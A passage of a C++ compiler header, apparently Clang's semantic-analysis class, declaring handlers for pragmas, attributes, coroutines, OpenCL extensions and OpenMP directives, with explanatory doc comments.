void CheckObjCMethodOverrides(ObjCMethodDecl *ObjCMethod,
ObjCInterfaceDecl *CurrentClass,
ResultTypeCompatibilityKind RTC);
enum PragmaOptionsAlignKind {
POAK_Native, // #pragma options align=native
POAK_Natural, // #pragma options align=natural
POAK_Packed, // #pragma options align=packed
POAK_Power, // #pragma options align=power
POAK_Mac68k, // #pragma options align=mac68k
POAK_Reset // #pragma options align=reset
};
/// ActOnPragmaClangSection - Called on well formed \#pragma clang section
void ActOnPragmaClangSection(SourceLocation PragmaLoc,
PragmaClangSectionAction Action,
PragmaClangSectionKind SecKind, StringRef SecName);
/// ActOnPragmaOptionsAlign - Called on well formed \#pragma options align.
void ActOnPragmaOptionsAlign(PragmaOptionsAlignKind Kind,
SourceLocation PragmaLoc);
/// ActOnPragmaPack - Called on well formed \#pragma pack(...).
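/// For example (illustrative): '#pragma pack(push, r1, 8)' pushes the
/// slot label "r1" with alignment 8, and '#pragma pack(pop, r1)' restores
/// the state saved under that label.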
void ActOnPragmaPack(SourceLocation PragmaLoc, PragmaMsStackAction Action,
StringRef SlotLabel, Expr *Alignment);
enum class PragmaPackDiagnoseKind {
NonDefaultStateAtInclude,
ChangedStateAtExit
};
void DiagnoseNonDefaultPragmaPack(PragmaPackDiagnoseKind Kind,
SourceLocation IncludeLoc);
void DiagnoseUnterminatedPragmaPack();
/// ActOnPragmaMSStruct - Called on well formed \#pragma ms_struct [on|off].
void ActOnPragmaMSStruct(PragmaMSStructKind Kind);
/// ActOnPragmaMSComment - Called on well formed
/// \#pragma comment(kind, "arg").
void ActOnPragmaMSComment(SourceLocation CommentLoc, PragmaMSCommentKind Kind,
StringRef Arg);
/// ActOnPragmaMSPointersToMembers - called on well formed \#pragma
/// pointers_to_members(representation method[, general purpose
/// representation]).
void ActOnPragmaMSPointersToMembers(
LangOptions::PragmaMSPointersToMembersKind Kind,
SourceLocation PragmaLoc);
/// Called on well formed \#pragma vtordisp().
void ActOnPragmaMSVtorDisp(PragmaMsStackAction Action,
SourceLocation PragmaLoc,
MSVtorDispMode Value);
enum PragmaSectionKind {
PSK_DataSeg,
PSK_BSSSeg,
PSK_ConstSeg,
PSK_CodeSeg,
};
bool UnifySection(StringRef SectionName,
int SectionFlags,
DeclaratorDecl *TheDecl);
bool UnifySection(StringRef SectionName,
int SectionFlags,
SourceLocation PragmaSectionLocation);
/// Called on well formed \#pragma bss_seg/data_seg/const_seg/code_seg.
void ActOnPragmaMSSeg(SourceLocation PragmaLocation,
PragmaMsStackAction Action,
llvm::StringRef StackSlotLabel,
StringLiteral *SegmentName,
llvm::StringRef PragmaName);
/// Called on well formed \#pragma section().
void ActOnPragmaMSSection(SourceLocation PragmaLocation,
int SectionFlags, StringLiteral *SegmentName);
/// Called on well-formed \#pragma init_seg().
void ActOnPragmaMSInitSeg(SourceLocation PragmaLocation,
StringLiteral *SegmentName);
/// Called on #pragma clang __debug dump II
void ActOnPragmaDump(Scope *S, SourceLocation Loc, IdentifierInfo *II);
/// ActOnPragmaDetectMismatch - Called on well-formed \#pragma detect_mismatch
void ActOnPragmaDetectMismatch(SourceLocation Loc, StringRef Name,
StringRef Value);
/// Are precise floating point semantics currently enabled?
bool isPreciseFPEnabled() {
return !CurFPFeatures.allowAssociativeMath() &&
!CurFPFeatures.noSignedZeros() &&
!CurFPFeatures.allowReciprocalMath() &&
!CurFPFeatures.allowApproximateFunctions();
}
/// ActOnPragmaFloatControl - Called on well-formed \#pragma float_control
void ActOnPragmaFloatControl(SourceLocation Loc, PragmaMsStackAction Action,
PragmaFloatControlKind Value);
/// ActOnPragmaUnused - Called on well-formed '\#pragma unused'.
void ActOnPragmaUnused(const Token &Identifier,
Scope *curScope,
SourceLocation PragmaLoc);
/// ActOnPragmaVisibility - Called on well formed \#pragma GCC visibility... .
void ActOnPragmaVisibility(const IdentifierInfo* VisType,
SourceLocation PragmaLoc);
NamedDecl *DeclClonePragmaWeak(NamedDecl *ND, IdentifierInfo *II,
SourceLocation Loc);
void DeclApplyPragmaWeak(Scope *S, NamedDecl *ND, WeakInfo &W);
/// ActOnPragmaWeakID - Called on well formed \#pragma weak ident.
void ActOnPragmaWeakID(IdentifierInfo* WeakName,
SourceLocation PragmaLoc,
SourceLocation WeakNameLoc);
/// ActOnPragmaRedefineExtname - Called on well formed
/// \#pragma redefine_extname oldname newname.
void ActOnPragmaRedefineExtname(IdentifierInfo* WeakName,
IdentifierInfo* AliasName,
SourceLocation PragmaLoc,
SourceLocation WeakNameLoc,
SourceLocation AliasNameLoc);
/// ActOnPragmaWeakAlias - Called on well formed \#pragma weak ident = ident.
void ActOnPragmaWeakAlias(IdentifierInfo* WeakName,
IdentifierInfo* AliasName,
SourceLocation PragmaLoc,
SourceLocation WeakNameLoc,
SourceLocation AliasNameLoc);
/// ActOnPragmaFPContract - Called on well formed
/// \#pragma {STDC,OPENCL} FP_CONTRACT and
/// \#pragma clang fp contract
void ActOnPragmaFPContract(LangOptions::FPModeKind FPC);
/// Called on well formed
/// \#pragma clang fp reassociate
void ActOnPragmaFPReassociate(bool IsEnabled);
/// ActOnPragmaFenvAccess - Called on well formed
/// \#pragma STDC FENV_ACCESS
void ActOnPragmaFEnvAccess(SourceLocation Loc, bool IsEnabled);
/// Called to set rounding mode for floating point operations.
void setRoundingMode(llvm::RoundingMode);
/// Called to set exception behavior for floating point operations.
void setExceptionMode(LangOptions::FPExceptionModeKind);
/// AddAlignmentAttributesForRecord - Adds any needed alignment attributes to
/// the record decl, to handle '\#pragma pack' and '\#pragma options align'.
void AddAlignmentAttributesForRecord(RecordDecl *RD);
/// AddMsStructLayoutForRecord - Adds ms_struct layout attribute to record.
void AddMsStructLayoutForRecord(RecordDecl *RD);
/// FreePackedContext - Deallocate and null out PackContext.
void FreePackedContext();
/// PushNamespaceVisibilityAttr - Note that we've entered a
/// namespace with a visibility attribute.
void PushNamespaceVisibilityAttr(const VisibilityAttr *Attr,
SourceLocation Loc);
/// AddPushedVisibilityAttribute - If '\#pragma GCC visibility' was used,
/// add an appropriate visibility attribute.
void AddPushedVisibilityAttribute(Decl *RD);
/// PopPragmaVisibility - Pop the top element of the visibility stack; used
/// for '\#pragma GCC visibility' and visibility attributes on namespaces.
void PopPragmaVisibility(bool IsNamespaceEnd, SourceLocation EndLoc);
/// FreeVisContext - Deallocate and null out VisContext.
void FreeVisContext();
/// AddCFAuditedAttribute - Check whether we're currently within
/// '\#pragma clang arc_cf_code_audited' and, if so, consider adding
/// the appropriate attribute.
void AddCFAuditedAttribute(Decl *D);
void ActOnPragmaAttributeAttribute(ParsedAttr &Attribute,
SourceLocation PragmaLoc,
attr::ParsedSubjectMatchRuleSet Rules);
void ActOnPragmaAttributeEmptyPush(SourceLocation PragmaLoc,
const IdentifierInfo *Namespace);
/// Called on well-formed '\#pragma clang attribute pop'.
void ActOnPragmaAttributePop(SourceLocation PragmaLoc,
const IdentifierInfo *Namespace);
/// Adds the attributes that have been specified using the
/// '\#pragma clang attribute push' directives to the given declaration.
void AddPragmaAttributes(Scope *S, Decl *D);
void DiagnoseUnterminatedPragmaAttribute();
/// Called on well formed \#pragma clang optimize.
void ActOnPragmaOptimize(bool On, SourceLocation PragmaLoc);
/// Get the location for the currently active "\#pragma clang optimize
/// off". If this location is invalid, then the state of the pragma is "on".
SourceLocation getOptimizeOffPragmaLocation() const {
return OptimizeOffPragmaLocation;
}
/// Only called on function definitions; if there is a pragma in scope
/// with the effect of a range-based optnone, consider marking the function
/// with attribute optnone.
void AddRangeBasedOptnone(FunctionDecl *FD);
/// Adds the 'optnone' attribute to the function declaration if there
/// are no conflicts; Loc represents the location causing the 'optnone'
/// attribute to be added (usually because of a pragma).
void AddOptnoneAttributeIfNoConflicts(FunctionDecl *FD, SourceLocation Loc);
/// AddAlignedAttr - Adds an aligned attribute to a particular declaration.
void AddAlignedAttr(Decl *D, const AttributeCommonInfo &CI, Expr *E,
bool IsPackExpansion);
void AddAlignedAttr(Decl *D, const AttributeCommonInfo &CI, TypeSourceInfo *T,
bool IsPackExpansion);
/// AddAssumeAlignedAttr - Adds an assume_aligned attribute to a particular
/// declaration.
void AddAssumeAlignedAttr(Decl *D, const AttributeCommonInfo &CI, Expr *E,
Expr *OE);
/// AddAllocAlignAttr - Adds an alloc_align attribute to a particular
/// declaration.
void AddAllocAlignAttr(Decl *D, const AttributeCommonInfo &CI,
Expr *ParamExpr);
/// AddAlignValueAttr - Adds an align_value attribute to a particular
/// declaration.
void AddAlignValueAttr(Decl *D, const AttributeCommonInfo &CI, Expr *E);
/// AddLaunchBoundsAttr - Adds a launch_bounds attribute to a particular
/// declaration.
void AddLaunchBoundsAttr(Decl *D, const AttributeCommonInfo &CI,
Expr *MaxThreads, Expr *MinBlocks);
/// AddModeAttr - Adds a mode attribute to a particular declaration.
void AddModeAttr(Decl *D, const AttributeCommonInfo &CI, IdentifierInfo *Name,
bool InInstantiation = false);
void AddParameterABIAttr(Decl *D, const AttributeCommonInfo &CI,
ParameterABI ABI);
enum class RetainOwnershipKind {NS, CF, OS};
void AddXConsumedAttr(Decl *D, const AttributeCommonInfo &CI,
RetainOwnershipKind K, bool IsTemplateInstantiation);
/// addAMDGPUFlatWorkGroupSizeAttr - Adds an amdgpu_flat_work_group_size
/// attribute to a particular declaration.
void addAMDGPUFlatWorkGroupSizeAttr(Decl *D, const AttributeCommonInfo &CI,
Expr *Min, Expr *Max);
/// addAMDGPUWavesPerEUAttr - Adds an amdgpu_waves_per_eu attribute to a
/// particular declaration.
void addAMDGPUWavesPerEUAttr(Decl *D, const AttributeCommonInfo &CI,
Expr *Min, Expr *Max);
bool checkNSReturnsRetainedReturnType(SourceLocation loc, QualType type);
//===--------------------------------------------------------------------===//
// C++ Coroutines TS
//
bool ActOnCoroutineBodyStart(Scope *S, SourceLocation KwLoc,
StringRef Keyword);
ExprResult ActOnCoawaitExpr(Scope *S, SourceLocation KwLoc, Expr *E);
ExprResult ActOnCoyieldExpr(Scope *S, SourceLocation KwLoc, Expr *E);
StmtResult ActOnCoreturnStmt(Scope *S, SourceLocation KwLoc, Expr *E);
ExprResult BuildResolvedCoawaitExpr(SourceLocation KwLoc, Expr *E,
bool IsImplicit = false);
ExprResult BuildUnresolvedCoawaitExpr(SourceLocation KwLoc, Expr *E,
UnresolvedLookupExpr* Lookup);
ExprResult BuildCoyieldExpr(SourceLocation KwLoc, Expr *E);
StmtResult BuildCoreturnStmt(SourceLocation KwLoc, Expr *E,
bool IsImplicit = false);
StmtResult BuildCoroutineBodyStmt(CoroutineBodyStmt::CtorArgs);
bool buildCoroutineParameterMoves(SourceLocation Loc);
VarDecl *buildCoroutinePromise(SourceLocation Loc);
void CheckCompletedCoroutineBody(FunctionDecl *FD, Stmt *&Body);
ClassTemplateDecl *lookupCoroutineTraits(SourceLocation KwLoc,
SourceLocation FuncLoc);
//===--------------------------------------------------------------------===//
// OpenCL extensions.
//
private:
std::string CurrOpenCLExtension;
/// Extensions required by an OpenCL type.
llvm::DenseMap<const Type*, std::set<std::string>> OpenCLTypeExtMap;
/// Extensions required by an OpenCL declaration.
llvm::DenseMap<const Decl*, std::set<std::string>> OpenCLDeclExtMap;
public:
llvm::StringRef getCurrentOpenCLExtension() const {
return CurrOpenCLExtension;
}
/// Check if a function declaration \p FD is associated with any
/// extensions present in OpenCLDeclExtMap and, if so, return the
/// name(s) of the extension(s).
std::string getOpenCLExtensionsFromDeclExtMap(FunctionDecl *FD);
/// Check if a function type \p FT is associated with any
/// extensions present in OpenCLTypeExtMap and, if so, return the
/// name(s) of the extension(s).
std::string getOpenCLExtensionsFromTypeExtMap(FunctionType *FT);
/// Find an extension in an appropriate extension map and return its name.
template<typename T, typename MapT>
std::string getOpenCLExtensionsFromExtMap(T* FT, MapT &Map);
void setCurrentOpenCLExtension(llvm::StringRef Ext) {
CurrOpenCLExtension = std::string(Ext);
}
/// Set OpenCL extensions for a type which can only be used when these
/// OpenCL extensions are enabled. If \p Exts is empty, do nothing.
/// \param Exts A space separated list of OpenCL extensions.
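/// For example (illustrative), \p Exts might be "cl_khr_fp64" or
/// "cl_khr_fp64 cl_khr_fp16".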
void setOpenCLExtensionForType(QualType T, llvm::StringRef Exts);
/// Set OpenCL extensions for a declaration which can only be
/// used when these OpenCL extensions are enabled. If \p Exts is empty, do
/// nothing.
/// \param Exts A space separated list of OpenCL extensions.
void setOpenCLExtensionForDecl(Decl *FD, llvm::StringRef Exts);
/// Set current OpenCL extensions for a type which can only be used
/// when these OpenCL extensions are enabled. If current OpenCL extension is
/// empty, do nothing.
void setCurrentOpenCLExtensionForType(QualType T);
/// Set current OpenCL extensions for a declaration which
/// can only be used when these OpenCL extensions are enabled. If current
/// OpenCL extension is empty, do nothing.
void setCurrentOpenCLExtensionForDecl(Decl *FD);
bool isOpenCLDisabledDecl(Decl *FD);
/// Check if type \p T corresponding to declaration specifier \p DS
/// is disabled due to required OpenCL extensions being disabled. If so,
/// emit diagnostics.
/// \return true if type is disabled.
bool checkOpenCLDisabledTypeDeclSpec(const DeclSpec &DS, QualType T);
/// Check if declaration \p D used by expression \p E
/// is disabled due to required OpenCL extensions being disabled. If so,
/// emit diagnostics.
/// \return true if the declaration is disabled.
bool checkOpenCLDisabledDecl(const NamedDecl &D, const Expr &E);
//===--------------------------------------------------------------------===//
// OpenMP directives and clauses.
//
private:
void *VarDataSharingAttributesStack;
/// Number of nested '#pragma omp declare target' directives.
unsigned DeclareTargetNestingLevel = 0;
/// Initialization of data-sharing attributes stack.
void InitDataSharingAttributesStack();
void DestroyDataSharingAttributesStack();
ExprResult
VerifyPositiveIntegerConstantInClause(Expr *Op, OpenMPClauseKind CKind,
bool StrictlyPositive = true);
/// Returns OpenMP nesting level for current directive.
unsigned getOpenMPNestingLevel() const;
/// Adjusts the function scopes index for the target-based regions.
void adjustOpenMPTargetScopeIndex(unsigned &FunctionScopesIndex,
unsigned Level) const;
/// Returns the number of scopes associated with the construct on the given
/// OpenMP level.
int getNumberOfConstructScopes(unsigned Level) const;
/// Push new OpenMP function region for non-capturing function.
void pushOpenMPFunctionRegion();
/// Pop OpenMP function region for non-capturing function.
void popOpenMPFunctionRegion(const sema::FunctionScopeInfo *OldFSI);
/// Check if the expression is allowed to be used in expressions for
/// OpenMP devices.
void checkOpenMPDeviceExpr(const Expr *E);
/// Checks if a type or a declaration is disabled due to the owning extension
/// being disabled, and emits diagnostic messages if it is disabled.
/// \param D type or declaration to be checked.
/// \param DiagLoc source location for the diagnostic message.
/// \param DiagInfo information to be emitted for the diagnostic message.
/// \param SrcRange source range of the declaration.
/// \param Map maps type or declaration to the extensions.
/// \param Selector selects diagnostic message: 0 for type and 1 for
/// declaration.
/// \return true if the type or declaration is disabled.
template <typename T, typename DiagLocT, typename DiagInfoT, typename MapT>
bool checkOpenCLDisabledTypeOrDecl(T D, DiagLocT DiagLoc, DiagInfoT DiagInfo,
MapT &Map, unsigned Selector = 0,
SourceRange SrcRange = SourceRange());
/// Helper to keep information about the current `omp begin/end declare
/// variant` nesting.
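///
/// For example (illustrative):
/// \code
///   #pragma omp begin declare variant match(device = {kind(gpu)})
///   void foo() {} // renamed with a context-selector-derived suffix
///   #pragma omp end declare variant
/// \endcode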
struct OMPDeclareVariantScope {
/// The associated OpenMP context selector.
OMPTraitInfo *TI;
/// The associated OpenMP context selector mangling.
std::string NameSuffix;
OMPDeclareVariantScope(OMPTraitInfo &TI);
};
/// The current `omp begin/end declare variant` scopes.
SmallVector<OMPDeclareVariantScope, 4> OMPDeclareVariantScopes;
/// The declarator \p D defines a function in the scope \p S which is nested
/// in an `omp begin/end declare variant` scope. In this method we create a
/// declaration for \p D and rename \p D according to the OpenMP context
/// selector of the surrounding scope.
FunctionDecl *
ActOnStartOfFunctionDefinitionInOpenMPDeclareVariantScope(Scope *S,
Declarator &D);
/// Register \p FD as specialization of \p BaseFD in the current `omp
/// begin/end declare variant` scope.
void ActOnFinishedFunctionDefinitionInOpenMPDeclareVariantScope(
FunctionDecl *FD, FunctionDecl *BaseFD);
public:
/// Return true if we are inside an `omp begin/end declare variant` scope.
bool isInOpenMPDeclareVariantScope() {
return !OMPDeclareVariantScopes.empty();
}
/// Given the potential call expression \p Call, determine if there is a
/// specialization via the OpenMP declare variant mechanism available. If
/// there is, return the specialized call expression, otherwise return the
/// original \p Call.
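///
/// For example (illustrative; 'foo' and 'foo_gpu' are hypothetical):
/// \code
///   void foo_gpu(void);
///   #pragma omp declare variant(foo_gpu) match(device = {kind(gpu)})
///   void foo(void);
///   // A call 'foo()' compiled for a GPU may be replaced by 'foo_gpu()'.
/// \endcode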
ExprResult ActOnOpenMPCall(ExprResult Call, Scope *Scope,
SourceLocation LParenLoc, MultiExprArg ArgExprs,
SourceLocation RParenLoc, Expr *ExecConfig);
/// Handle a `omp begin declare variant`.
void ActOnOpenMPBeginDeclareVariant(SourceLocation Loc, OMPTraitInfo &TI);
/// Handle a `omp end declare variant`.
void ActOnOpenMPEndDeclareVariant();
/// Checks if the variant/multiversion functions are compatible.
bool areMultiversionVariantFunctionsCompatible(
const FunctionDecl *OldFD, const FunctionDecl *NewFD,
const PartialDiagnostic &NoProtoDiagID,
const PartialDiagnosticAt &NoteCausedDiagIDAt,
const PartialDiagnosticAt &NoSupportDiagIDAt,
const PartialDiagnosticAt &DiffDiagIDAt, bool TemplatesSupported,
bool ConstexprSupported, bool CLinkageMayDiffer);
/// Tries to capture a lambda's captured variables in the OpenMP region
/// before the original lambda itself is captured.
void tryCaptureOpenMPLambdas(ValueDecl *V);
/// Return true if the provided declaration \p D should be captured by
/// reference.
/// \param Level Relative level of the nested OpenMP construct for which
/// the check is performed.
/// \param OpenMPCaptureLevel Capture level within an OpenMP construct.
bool isOpenMPCapturedByRef(const ValueDecl *D, unsigned Level,
unsigned OpenMPCaptureLevel) const;
/// Check if the specified variable is used in one of the private
/// clauses (private, firstprivate, lastprivate, reduction etc.) in OpenMP
/// constructs.
VarDecl *isOpenMPCapturedDecl(ValueDecl *D, bool CheckScopeInfo = false,
unsigned StopAt = 0);
ExprResult getOpenMPCapturedExpr(VarDecl *Capture, ExprValueKind VK,
ExprObjectKind OK, SourceLocation Loc);
/// If the current region is a loop-based region, mark the start of the loop
/// construct.
void startOpenMPLoop();
/// If the current region is a range loop-based region, mark the start of the
/// loop construct.
void startOpenMPCXXRangeFor();
/// Check if the specified variable is used in 'private' clause.
/// \param Level Relative level of the nested OpenMP construct for which
/// the check is performed.
OpenMPClauseKind isOpenMPPrivateDecl(ValueDecl *D, unsigned Level,
unsigned CapLevel) const;
/// Sets the OpenMP capture kind (OMPC_private, OMPC_firstprivate, OMPC_map
/// etc.) for \p FD based on the DSA of the corresponding captured
/// declaration \p D.
void setOpenMPCaptureKind(FieldDecl *FD, const ValueDecl *D, unsigned Level);
/// Check if the specified variable is captured by 'target' directive.
/// \param Level Relative level of the nested OpenMP construct for which
/// the check is performed.
bool isOpenMPTargetCapturedDecl(const ValueDecl *D, unsigned Level,
unsigned CaptureLevel) const;
/// Check if the specified global variable must be captured by outer capture
/// regions.
/// \param Level Relative level of the nested OpenMP construct for which
/// the check is performed.
bool isOpenMPGlobalCapturedDecl(ValueDecl *D, unsigned Level,
unsigned CaptureLevel) const;
ExprResult PerformOpenMPImplicitIntegerConversion(SourceLocation OpLoc,
Expr *Op);
/// Called on start of new data sharing attribute block.
void StartOpenMPDSABlock(OpenMPDirectiveKind K,
const DeclarationNameInfo &DirName, Scope *CurScope,
SourceLocation Loc);
/// Start analysis of clauses.
void StartOpenMPClause(OpenMPClauseKind K);
/// End analysis of clauses.
void EndOpenMPClause();
/// Called on end of data sharing attribute block.
void EndOpenMPDSABlock(Stmt *CurDirective);
/// Check if the current region is an OpenMP loop region and, if it is,
/// mark the loop control variable, used in \p Init for loop
/// initialization, as private by default.
/// \param Init First part of the for loop.
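///
/// For example (illustrative):
/// \code
///   #pragma omp for
///   for (int I = 0; I < N; ++I) { } // I is private by default
/// \endcode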
void ActOnOpenMPLoopInitialization(SourceLocation ForLoc, Stmt *Init);
// OpenMP directives and clauses.
/// Called on a correct id-expression from '#pragma omp
/// threadprivate'.
ExprResult ActOnOpenMPIdExpression(Scope *CurScope, CXXScopeSpec &ScopeSpec,
const DeclarationNameInfo &Id,
OpenMPDirectiveKind Kind);
/// Called on well-formed '#pragma omp threadprivate'.
DeclGroupPtrTy ActOnOpenMPThreadprivateDirective(
SourceLocation Loc,
ArrayRef<Expr *> VarList);
/// Builds a new OMPThreadPrivateDecl and checks its correctness.
OMPThreadPrivateDecl *CheckOMPThreadPrivateDecl(SourceLocation Loc,
ArrayRef<Expr *> VarList);
/// Called on well-formed '#pragma omp allocate'.
DeclGroupPtrTy ActOnOpenMPAllocateDirective(SourceLocation Loc,
ArrayRef<Expr *> VarList,
ArrayRef<OMPClause *> Clauses,
DeclContext *Owner = nullptr);
/// Called on well-formed '#pragma omp requires'.
DeclGroupPtrTy ActOnOpenMPRequiresDirective(SourceLocation Loc,
ArrayRef<OMPClause *> ClauseList);
/// Check restrictions on the Requires directive.
OMPRequiresDecl *CheckOMPRequiresDecl(SourceLocation Loc,
ArrayRef<OMPClause *> Clauses);
/// Check if the specified type is allowed to be used in 'omp declare
/// reduction' construct.
QualType ActOnOpenMPDeclareReductionType(SourceLocation TyLoc,
TypeResult ParsedType);
/// Called on start of '#pragma omp declare reduction'.
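///
/// The construct being parsed looks like (illustrative; 'myadd' is a
/// hypothetical reduction identifier):
/// \code
///   #pragma omp declare reduction(myadd : int : omp_out += omp_in) initializer(omp_priv = 0)
/// \endcode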
DeclGroupPtrTy ActOnOpenMPDeclareReductionDirectiveStart(
Scope *S, DeclContext *DC, DeclarationName Name,
ArrayRef<std::pair<QualType, SourceLocation>> ReductionTypes,
AccessSpecifier AS, Decl *PrevDeclInScope = nullptr);
/// Initialize the declare reduction construct combiner.
void ActOnOpenMPDeclareReductionCombinerStart(Scope *S, Decl *D);
/// Finish the current declare reduction construct combiner.
void ActOnOpenMPDeclareReductionCombinerEnd(Decl *D, Expr *Combiner);
/// Initialize declare reduction construct initializer.
/// \return omp_priv variable.
VarDecl *ActOnOpenMPDeclareReductionInitializerStart(Scope *S, Decl *D);
/// Finish current declare reduction construct initializer.
void ActOnOpenMPDeclareReductionInitializerEnd(Decl *D, Expr *Initializer,
VarDecl *OmpPrivParm);
/// Called at the end of '#pragma omp declare reduction'.
DeclGroupPtrTy ActOnOpenMPDeclareReductionDirectiveEnd(
Scope *S, DeclGroupPtrTy DeclReductions, bool IsValid);
/// Check variable declaration in 'omp declare mapper' construct.
TypeResult ActOnOpenMPDeclareMapperVarDecl(Scope *S, Declarator &D);
/// Check if the specified type is allowed to be used in 'omp declare
/// mapper' construct.
QualType ActOnOpenMPDeclareMapperType(SourceLocation TyLoc,
TypeResult ParsedType);
/// Called on start of '#pragma omp declare mapper'.
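///
/// The construct being parsed looks like (illustrative; 'mid' is a
/// hypothetical mapper identifier):
/// \code
///   struct S { int Len; int *Buf; };
///   #pragma omp declare mapper(mid : struct S s) map(s, s.Buf[0:s.Len])
/// \endcode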
OMPDeclareMapperDecl *ActOnOpenMPDeclareMapperDirectiveStart(
Scope *S, DeclContext *DC, DeclarationName Name, QualType MapperType,
SourceLocation StartLoc, DeclarationName VN, AccessSpecifier AS,
Decl *PrevDeclInScope = nullptr);
/// Build the mapper variable of '#pragma omp declare mapper'.
void ActOnOpenMPDeclareMapperDirectiveVarDecl(OMPDeclareMapperDecl *DMD,
Scope *S, QualType MapperType,
SourceLocation StartLoc,
DeclarationName VN);
/// Called at the end of '#pragma omp declare mapper'.
DeclGroupPtrTy
ActOnOpenMPDeclareMapperDirectiveEnd(OMPDeclareMapperDecl *D, Scope *S,
ArrayRef<OMPClause *> ClauseList);
/// Called on the start of a declare target region, i.e. '#pragma omp declare target'.
bool ActOnStartOpenMPDeclareTargetDirective(SourceLocation Loc);
/// Called at the end of a declare target region, i.e. '#pragma omp end declare target'.
void ActOnFinishOpenMPDeclareTargetDirective();
/// Searches for the provided declaration name for the OpenMP declare target
/// directive.
NamedDecl *
lookupOpenMPDeclareTargetName(Scope *CurScope, CXXScopeSpec &ScopeSpec,
const DeclarationNameInfo &Id,
NamedDeclSetType &SameDirectiveDecls);
/// Called on correct id-expression from the '#pragma omp declare target'.
void ActOnOpenMPDeclareTargetName(NamedDecl *ND, SourceLocation Loc,
OMPDeclareTargetDeclAttr::MapTypeTy MT,
OMPDeclareTargetDeclAttr::DevTypeTy DT);
/// Check declaration inside target region.
void
checkDeclIsAllowedInOpenMPTarget(Expr *E, Decl *D,
SourceLocation IdLoc = SourceLocation());
/// Finishes analysis of the deferred function calls that may be declared
/// as host/nohost during device/host compilation.
void finalizeOpenMPDelayedAnalysis(const FunctionDecl *Caller,
const FunctionDecl *Callee,
SourceLocation Loc);
/// Return true if inside an OpenMP declare target region.
bool isInOpenMPDeclareTargetContext() const {
return DeclareTargetNestingLevel > 0;
}
/// Return true if inside an OpenMP target execution directive.
bool isInOpenMPTargetExecutionDirective() const;
/// Return the number of captured regions created for an OpenMP directive.
static int getOpenMPCaptureLevels(OpenMPDirectiveKind Kind);
/// Initialization of the captured region for an OpenMP region.
void ActOnOpenMPRegionStart(OpenMPDirectiveKind DKind, Scope *CurScope);
/// End of OpenMP region.
///
/// \param S Statement associated with the current OpenMP region.
/// \param Clauses List of clauses for the current OpenMP region.
///
/// \returns Statement for finished OpenMP region.
StmtResult ActOnOpenMPRegionEnd(StmtResult S, ArrayRef<OMPClause *> Clauses);
StmtResult ActOnOpenMPExecutableDirective(
OpenMPDirectiveKind Kind, const DeclarationNameInfo &DirName,
OpenMPDirectiveKind CancelRegion, ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc, SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp parallel' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPParallelDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
using VarsWithInheritedDSAType =
llvm::SmallDenseMap<const ValueDecl *, const Expr *, 4>;
/// Called on well-formed '\#pragma omp simd' after parsing
/// of the associated statement.
StmtResult
ActOnOpenMPSimdDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp for' after parsing
/// of the associated statement.
StmtResult
ActOnOpenMPForDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp for simd' after parsing
/// of the associated statement.
StmtResult
ActOnOpenMPForSimdDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp sections' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPSectionsDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp section' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPSectionDirective(Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp single' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPSingleDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp master' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPMasterDirective(Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp critical' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPCriticalDirective(const DeclarationNameInfo &DirName,
ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp parallel for' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp parallel for simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp parallel master' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelMasterDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp parallel sections' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelSectionsDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp task' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPTaskDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp taskyield'.
StmtResult ActOnOpenMPTaskyieldDirective(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp barrier'.
StmtResult ActOnOpenMPBarrierDirective(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp taskwait'.
StmtResult ActOnOpenMPTaskwaitDirective(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp taskgroup'.
